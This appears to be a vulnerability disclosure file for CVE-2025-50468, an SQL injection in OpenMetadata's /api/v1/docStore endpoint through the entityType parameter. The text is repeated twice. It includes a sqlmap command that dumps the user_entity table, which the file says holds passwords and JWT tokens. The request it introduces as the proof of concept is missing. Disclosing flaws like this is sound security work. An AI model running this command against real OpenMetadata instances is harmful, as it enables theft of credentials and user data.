javadk/CVE-2025-50468.txt

## CVE-2025-50468.txt
[Suggested description]
OpenMetadata <=1.4.4 is vulnerable to SQL Injection. An attacker can
extract information from the database in function listCount in the
DocStoreDAO interface. The entityType parameters can be used to build a
SQL query.

------------------------------------------

[Additional Information]
### Details
The open-metadata project exposes the function listCount in DocStoreDAO interface at the API URL /api/v1/docStore. The entityType parameter is directly used to build a SQL query in line 4411 and 4412, as it can be seen in the following snippet:
![image](https://gist.github.com/user-attachments/assets/02506acb-3348-473f-8373-a1a896283b01)
### PoC

For instance, the table name from the openmetadata_db database can be extracted using the following request for reproducing this issue:

And we can use sqlmap to automate the process of retrieving entries from the column "json" for the table user_entity in the openmetadata_db:
sqlmap.py -u http://localhost:8585/api/v1/docStore?entityType=* --headers="Authorization: Bearer JWT TOKEN" --level=5 --risk=3 -D openmetadata_db -T user_entity -C json   "dump


![image](https://gist.github.com/user-attachments/assets/4ef44f94-79aa-44fe-a667-97adf88c5358)
Passwords, JWT tokens, and other user data are contained in this table.

------------------------------------------

[Vulnerability Type]
SQL Injection

------------------------------------------

[Vendor of Product]
open-metadata

------------------------------------------

[Affected Product Code Base]
open-metadata 1.4.4 - =<1.4.4

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Escalation of Privileges]
true

------------------------------------------

[Impact Information Disclosure]
true

------------------------------------------

[Attack Vectors]
### Summary
A SQL injection vulnerability exists in open-metadata 1.4.1 where an authenticated, low-privileged remote attacker could extract information from the database.
### Details
The open-metadata project exposes the function listCount in DocStoreDAO interface at the API URL /api/v1/docStore. The entityType parameter is directly used to build a SQL query in line 4411 and 4412.


------------------------------------------

[Reference]
https://github.com/open-metadata/OpenMetadata/blob/4b9145a9da7ed95b7f868ab9f351e3d759af47d7/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/CollectionDAO.java#L4411

https://github.com/open-metadata/OpenMetadata/blob/4b9145a9da7ed95b7f868ab9f351e3d759af47d7/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/CollectionDAO.java#L4412
	[Suggested description]
	OpenMetadata <=1.4.4 is vulnerable to SQL Injection. An attacker can
	extract information from the database in function listCount in the
	DocStoreDAO interface. The entityType parameters can be used to build a
	SQL query.

	------------------------------------------

	[Additional Information]
	### Details
	The open-metadata project exposes the function listCount in DocStoreDAO interface at the API URL /api/v1/docStore. The entityType parameter is directly used to build a SQL query in line 4411 and 4412, as it can be seen in the following snippet:
	![image](https://gist.github.com/user-attachments/assets/02506acb-3348-473f-8373-a1a896283b01)
	### PoC

	For instance, the table name from the openmetadata_db database can be extracted using the following request for reproducing this issue:

	And we can use sqlmap to automate the process of retrieving entries from the column "json" for the table user_entity in the openmetadata_db:
	sqlmap.py -u http://localhost:8585/api/v1/docStore?entityType=* --headers="Authorization: Bearer JWT TOKEN" --level=5 --risk=3 -D openmetadata_db -T user_entity -C json "dump


	![image](https://gist.github.com/user-attachments/assets/4ef44f94-79aa-44fe-a667-97adf88c5358)
	Passwords, JWT tokens, and other user data are contained in this table.

	------------------------------------------

	[Vulnerability Type]
	SQL Injection

	------------------------------------------

	[Vendor of Product]
	open-metadata

	------------------------------------------

	[Affected Product Code Base]
	open-metadata 1.4.4 - =<1.4.4

	------------------------------------------

	[Attack Type]
	Remote

	------------------------------------------

	[Impact Escalation of Privileges]
	true

	------------------------------------------

	[Impact Information Disclosure]
	true

	------------------------------------------

	[Attack Vectors]
	### Summary
	A SQL injection vulnerability exists in open-metadata 1.4.1 where an authenticated, low-privileged remote attacker could extract information from the database.
	### Details
	The open-metadata project exposes the function listCount in DocStoreDAO interface at the API URL /api/v1/docStore. The entityType parameter is directly used to build a SQL query in line 4411 and 4412.


	------------------------------------------

	[Reference]
	https://github.com/open-metadata/OpenMetadata/blob/4b9145a9da7ed95b7f868ab9f351e3d759af47d7/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/CollectionDAO.java#L4411

	https://github.com/open-metadata/OpenMetadata/blob/4b9145a9da7ed95b7f868ab9f351e3d759af47d7/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/CollectionDAO.java#L4412
No results found